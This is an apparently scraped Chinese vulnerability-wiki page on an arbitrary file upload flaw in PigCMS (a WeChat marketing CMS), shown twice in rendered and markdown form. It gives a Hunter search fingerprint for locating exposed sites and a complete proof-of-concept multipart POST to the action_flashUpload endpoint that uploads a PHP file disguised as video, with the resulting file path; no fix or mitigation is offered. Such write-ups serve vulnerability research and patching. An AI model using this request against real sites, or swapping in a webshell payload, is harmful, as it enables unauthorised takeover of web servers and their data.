fofamini-wiki

登录白背景

源码

PigCMS action_flashUpload 任意文件上传漏洞

一、漏洞简介

PigCms（又称小猪CMS）是一个基于php+mysql的多用户微信营销系统，是国内使用较多、功能强大、性能稳定的多用户微信营销系统。PigCms存在一处前台任意文件上传漏洞，攻击者可以通过该漏洞进行任意文件上传，从而获取网站权限。

二、影响版本

PigCMS

三、资产测绘

hunterweb.body="/tpl/Home/pigcms/common/js/daohang.js"
特征

四、漏洞复现

POST /cms/manage/admin.php?m=manage&c=background&a=action_flashUpload HTTP/1.1
Host: xx.xx.xx.xx
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----aaa

------aaa
Content-Disposition: form-data; name="filePath"; filename="test.php"
Content-Type: video/x-flv

<?php phpinfo();?>
------aaa

上传文件位置

/cms/upload/images/2023/11/11/1699633023MuDd.php

原文: https://www.yuque.com/xiaokp7/ocvun2/wm82ex5yhlfvbnyk

# PigCMS action_flashUpload 任意文件上传漏洞

# 一、漏洞简介
PigCms（又称小猪CMS）是一个基于php+mysql的多用户微信营销系统，是国内使用较多、功能强大、性能稳定的多用户微信营销系统。PigCms存在一处前台任意文件上传漏洞，攻击者可以通过该漏洞进行任意文件上传，从而获取网站权限。

# 二、影响版本

- PigCMS

# 三、资产测绘

- hunter`web.body="/tpl/Home/pigcms/common/js/daohang.js"`
- 特征

![image.png](./img/DPNLLlFhIKFSJOsT/1699633177369-21e7a540-279f-4309-b746-0a25404cbc4a-411940.png)

# 四、漏洞复现
```
POST /cms/manage/admin.php?m=manage&c=background&a=action_flashUpload HTTP/1.1
Host: xx.xx.xx.xx
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----aaa

------aaa
Content-Disposition: form-data; name="filePath"; filename="test.php"
Content-Type: video/x-flv

<?php phpinfo();?>
------aaa
```
![image.png](./img/DPNLLlFhIKFSJOsT/1699633206770-92fb9f73-6f66-429e-98ea-aacbcc22bf14-936211.png)
上传文件位置
```
/cms/upload/images/2023/11/11/1699633023MuDd.php
```
![image.png](./img/DPNLLlFhIKFSJOsT/1699633269429-8e889e7d-e50c-4887-a193-ad5e8b5126d3-813555.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/wm82ex5yhlfvbnyk>